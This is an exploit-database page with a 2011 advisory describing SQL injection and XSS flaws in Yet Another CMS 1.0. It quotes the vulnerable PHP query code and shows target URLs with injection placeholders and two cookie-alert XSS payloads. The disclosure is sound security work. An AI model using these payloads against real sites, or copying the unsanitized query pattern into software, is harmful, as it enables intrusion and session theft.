Yet Another CMS 1.0 SQL Injection & XSS vulnerabilities

vendor:

Yet Another CMS

by:

Stefan Schurtz

8.8

CVSS

HIGH

SQL Injection & XSS

CWE

Product Name: Yet Another CMS

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:yetanothercms:yet_another_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Yet Another CMS 1.0 SQL Injection & XSS vulnerabilities

Yet Another CMS 1.0 is prone to multiple SQL Injection and XSS vulnerabilities. The vulnerability is due to the application's failure to properly sanitize user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability by submitting malicious SQL statements in the 'pattern' parameter of the 'search.php' script. This can allow the attacker to view, add, modify or delete records in the back-end database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically construct SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

Advisory:              	Yet Another CMS 1.0 SQL Injection & XSS vulnerabilities
Advisory ID:           	SSCHADV2011-031
Author:                	Stefan Schurtz
Affected Software:  	Successfully tested on Yet Another CMS 1.0
Vendor URL:          	http://yetanothercms.codeplex.com/
Vendor Status:       	informed

==========================
Vulnerability Description:
==========================

Yet Another CMS 1.0 is prone to multiple SQL Injection and XSS vulnerabilities

==================
Technical Details:
==================

// search.php
$result_set = get_search_result_set($_POST['pattern']);

// includes/functions.php
function get_search_result_set($pattern, $public = true) {
      global $connection;
      $query = "SELECT
                   id,
                   subject_id,
                   menu_name,
                   position,
                   visible,
                   content,
                   CONCAT('... ', SUBSTRING(content, LOCATE('" . $pattern . "',content), 200), ' ...') as fragment
                FROM
                   pages
                WHERE
                   content like '%" . $pattern . "%'";

// index.php
<?php find_selected_page(); ?>

// includes/functions.php
function find_selected_page() {
                global $sel_subject;
                global $sel_page;
                if (isset($_GET['subj'])) {
                        $sel_subject = get_subject_by_id($_GET['subj']);
                        $sel_page = get_default_page($sel_subject['id']);
                } elseif (isset($_GET['page'])) {
                        $sel_subject = NULL;
                        $sel_page = get_page_by_id($_GET['page']);
                } else {
                        $sel_subject = NULL;
                        $sel_page = NULL;
                }
}


function get_page_by_id($page_id) {
                global $connection;
                $query = "SELECT * ";
                $query .= "FROM pages ";
                $query .= "WHERE id=" . $page_id ." ";
                $query .= "LIMIT 1";

==================
Exploit
==================

SQL Injection

http://<target>/index.php?page=[sql injection]
http://<target>/search.php -> 'search field' -> [sql injection]

XSS

http://<target>/search.php -> 'search field' -> '"</script><script>alert(document.cookie)</script>
http://<target>/index.php?page='</script><script>alert(document.cookie)</script>

====================
Disclosure Timeline:
====================

18-Oct-2011 - informed developers

========
Credits:
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References:
===========

http://yetanothercms.codeplex.com/
http://yetanothercms.codeplex.com/workitem/643
http://www.rul3z.de/advisories/SSCHADV2011-031.txt